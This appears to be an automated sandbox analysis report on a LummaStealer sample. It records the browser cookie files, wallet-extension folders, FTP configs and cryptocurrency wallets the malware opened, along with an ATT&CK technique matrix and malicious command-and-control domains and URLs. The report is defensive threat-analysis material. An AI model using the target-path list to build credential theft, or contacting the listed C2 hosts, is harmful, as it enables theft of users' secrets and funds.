                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: Yara matchFile source: 00000002.00000003.1822946164.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 2492, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 2492, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                311
                Process Injection
                1
                Masquerading
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                23
                Virtualization/Sandbox Evasion
                LSASS Memory351
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)1
                Disable or Modify Tools
                Security Account Manager23
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares41
                Data from Local System
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                Process Injection
                NTDS1
                Process Discovery
                Distributed Component Object Model2
                Clipboard Data
                Protocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information
                Cached Domain Credentials33
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                ReploidReplic.exe61%ReversingLabsWin32.Spyware.Lummastealer
                ReploidReplic.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\gdi32.dll68%ReversingLabsWin32.Trojan.LummaStealer
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://abruptyopsn.shop/apil100%Avira URL Cloudmalware
                https://abruptyopsn.shop/api3L100%Avira URL Cloudmalware
                https://abruptyopsn.shop/api100%Avira URL Cloudmalware
                https://abruptyopsn.shop/Y100%Avira URL Cloudmalware
                ingreem-eilish.biz0%Avira URL Cloudsafe
                http://crl.microsoft.0%Avira URL Cloudsafe
                https://abruptyopsn.shop/Q100%Avira URL Cloudmalware
                https://abruptyopsn.shop:443/api100%Avira URL Cloudmalware
                https://abruptyopsn.shop/s100%Avira URL Cloudmalware
                https://abruptyopsn.shop/apiF9100%Avira URL Cloudmalware
                https://abruptyopsn.shop/100%Avira URL Cloudmalware
                https://abruptyopsn.shop/apiHP2100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                abruptyopsn.shop
                104.21.48.1
                truetrue
                  unknown
                  nearycrepso.shop
                  unknown
                  unknowntrue
                    unknown
                    ingreem-eilish.biz
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      rabidcowse.shopfalse
                        high
                        wholersorie.shopfalse
                          high
                          https://abruptyopsn.shop/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          cloudewahsj.shopfalse
                            high
                            noisycuttej.shopfalse
                              high
                              nearycrepso.shopfalse
                                high
                                ingreem-eilish.biztrue
                                • Avira URL Cloud: safe
                                unknown
                                framekgirus.shopfalse
                                  high
                                  tirepublicerj.shopfalse
                                    high
                                    abruptyopsn.shopfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://abruptyopsn.shop/Qaspnet_regiis.exe, 00000002.00000003.1793722966.0000000005206000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1793743243.000000000520C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1794325694.000000000520F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://abruptyopsn.shop/apiF9aspnet_regiis.exe, 00000002.00000002.1858796383.0000000002CEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://abruptyopsn.shop/api3Laspnet_regiis.exe, 00000002.00000003.1765757138.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://abruptyopsn.shop/apilaspnet_regiis.exe, 00000002.00000003.1765757138.0000000002C8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://upx.sf.netAmcache.hve.5.drfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016aspnet_regiis.exe, 00000002.00000003.1793392257.0000000005257000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766844349.00000000052A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766976913.0000000005257000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17aspnet_regiis.exe, 00000002.00000003.1793392257.0000000005257000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766844349.00000000052A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766976913.0000000005257000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://abruptyopsn.shop/Yaspnet_regiis.exe, 00000002.00000003.1765757138.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crl.microsoft.aspnet_regiis.exe, 00000002.00000003.1848093457.0000000002C96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1822946164.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://abruptyopsn.shop:443/apiaspnet_regiis.exe, 00000002.00000002.1859335137.0000000005218000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1847974851.0000000005218000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://abruptyopsn.shop/saspnet_regiis.exe, 00000002.00000003.1848294035.0000000002CF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                http://x1.c.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://x1.i.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installaspnet_regiis.exe, 00000002.00000003.1766976913.0000000005232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.microsofaspnet_regiis.exe, 00000002.00000003.1766844349.00000000052A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesaspnet_regiis.exe, 00000002.00000003.1766976913.0000000005232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://abruptyopsn.shop/aspnet_regiis.exe, 00000002.00000002.1858835809.0000000002CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://abruptyopsn.shop/apiHP2aspnet_regiis.exe, 00000002.00000003.1804951361.0000000002D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  104.21.48.1
                                                                                  abruptyopsn.shopUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1582548
                                                                                  Start date and time:2024-12-30 21:08:06 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 6m 1s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:10
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:ReploidReplic.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@5/7@3/1
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 98%
                                                                                  • Number of executed functions: 33
                                                                                  • Number of non-executed functions: 64
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.160.17, 4.245.163.56, 13.107.246.45
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: ReploidReplic.exe
                                                                                  TimeTypeDescription
                                                                                  15:09:03API Interceptor9x Sleep call for process: aspnet_regiis.exe modified
                                                                                  15:09:16API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  104.21.48.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                  • twirpx.org/administrator/index.php
                                                                                  SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.antipromil.site/7ykh/
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  abruptyopsn.shopBasesRow.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.64.1
